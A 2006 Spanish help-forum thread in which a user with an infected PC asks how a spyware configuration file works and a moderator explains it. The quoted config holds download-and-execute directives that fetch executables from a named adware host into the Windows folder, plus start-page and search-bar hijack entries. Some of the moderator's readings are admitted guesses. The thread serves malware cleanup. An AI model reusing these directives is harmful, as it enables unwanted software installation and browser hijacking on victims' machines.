| |||||||
| Foro de Virus y Spywares Ayuda con: Malwares - Virus - Spywares - Troyanos - Adwares - Worms - Hijackers - Dialers - Rootkits - Keylogger - etc.) Plantéanos tu problema en este sector. No ponga su log de HijackThis aquí !! |
 |
| | Enviar a: | Herramientas |
 | 
25/01/06, 22:29:16
|  |
| |||
 Saben como funciona el siguiente archivo htm Encontre mi equipo infectado com spyware y al realizar un analisis me llevo a este archivo de nombre data.htm este archivo contiene lo mostrado abajo. Los archivos mencionados en el archivo (timessquare.exe y adtech2006.exe)los encontre en mi equipo y es spyware pero me surge la duda de como funcina este archivo, ya que supongo que es un archivo de configuración, pero me gustaria saber como funciona el spyware es decir, acceso al sito web malicioso y se bajan los archivos maliciosos y despues lee este archivo de configuracion, pero que más hace? para que sirven los comandos ew, sp, sb, as, etc... Espero alguien tenga info o sepa algo..ya que googleando solo encontre otra página con este contenido y nada de info Saludos ************************************************** * ew,http://content.dollarrevenue.com/timessquare.exe,c:\windows\timessquare.exe sp,http://www.findthewebsiteyouneed.com sb,http://searchbar.findthewebsiteyouneed.com as,0 rd,http://content.dollarrevenue.com/adtech2006.exe,c:\windows\adtech2006.exe tb,0 spy,0 exe,0 dll,0 ************************************************** * |
| InfoSpyware | ||
| |
|
25/01/06, 23:18:48
| |
| ||||
| Re: Saben como funciona el siguiente archivo htm Bienvenid@ a Forospyware! El archivo en cuestión es se encarga de dos cosas principalmente: Una: Hace un hijack (secuestro) de la página de inicio y es la dirección web que te coloca allí, Dos: te mostrará o descargará directamente unos archivos que son los que infecctaran el sistema, la infección es conocida como el malware PSGuard Los archivos que descarga buscan que la infección permanezca en cada inicio del sistema creando un valor en la clave Run del registro de windows Estos archivos también vienen (en la mayoría de los casos) acompañados por otros, el más común es un archivo temporal (hp****.tmp) que se ejecuta como un Browser Object Helper y que mantiene el hijack de la página de inicio del IE (Internet Explorer) Los pasos para la eliminación de este malware están en este enlace Salu2 Novedades del Foro | Antivirus Online | Eliminar Malwares | Políticas del Foro | Blog * Ayúdanos haciendo una DONACIÓN para poder seguir Ayudando. * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro. |
|
07/02/06, 20:21:26
| |
| |||
| Re: Saben como funciona el siguiente archivo htm Gracias por la respuesta.. pero lo que queria saber es más info sobre el archivo que les comento.. por lo que tomare como respuesta eso de que hace un hijack, pero a mi me gustaria saber para que sirvesirven los comandos ew, sp, sb, as, etc... |
|
07/02/06, 21:04:50
| |
| ||||
| Re: Saben como funciona el siguiente archivo htm Buenas..... ew Actúa como un Go To en la programación, "ir a", pero en realidad no es igual, significa Execute Web, es decir, ejecutar desde la red, como es un ejecutable, se activa de forma automática y crea una copia en el archivo local Al hacer esto, sp sale de StartPage, es decir, un comando que indica que la Pagina de inicio será la que allí coloca, luego sb se encarga de cambiar la barra de busqueda por la colocada (Search Bar - sb) as, 0 no estoy muy seguro, pero al parecer se usa para determinar que en lo anterior (pagina de inicio y Barra de busqueda) no hay nada rd Funciona como una redirección de página hacia otro ejecutable los demás "comandos" son para engañar al sistema y decirle que lo que se ejecuta no es ningún virus Salu2 Novedades del Foro | Antivirus Online | Eliminar Malwares | Políticas del Foro | Blog * Ayúdanos haciendo una DONACIÓN para poder seguir Ayudando. * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro. |
|
08/02/06, 12:12:01
| |
| |||
| Re: Saben como funciona el siguiente archivo htm Gracias por la respuesta..solo una duda..como sabes esto? de algun documento o por pruebas de laboratorio? o suposiciones.. digo si se puede saber. :p Y nuevamente gracias por la respuesta. |
|
08/02/06, 16:55:00
| |
| ||||
| Re: Saben como funciona el siguiente archivo htm Cita:
 Salu2 Novedades del Foro | Antivirus Online | Eliminar Malwares | Políticas del Foro | Blog * Ayúdanos haciendo una DONACIÓN para poder seguir Ayudando. * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro. |
|
« Tema Anterior
|
Próximo Tema »
| Herramientas | |
| |
| 
Temas Similares | |
| Tema | Autor | Foro | Respuestas | Último mensaje |
| el usb no funciona | joder que asco | Foro de Hardware | 15 | 08/10/07 18:57:52 |
| No me deja acceder a la página de mi banco | lolus | Foro de Virus y Spywares | 10 | 03/08/07 18:25:26 |
| auxilio me alta el siguiente archivo NETFLTDI.VXD | ARGONDEL | Foro de Windows | 2 | 07/02/06 17:21:11 |
| se vuelve muy lento de vez en cuando(Solucionado) | mcmollas | Temas Solucionados | 43 | 28/01/06 05:51:07 |
| como funciona el pinnacle expression | evangelio | Foro de Software | 1 | 22/12/05 14:34:10 |
Todas las horas son GMT -4. La hora es 10:15:24.
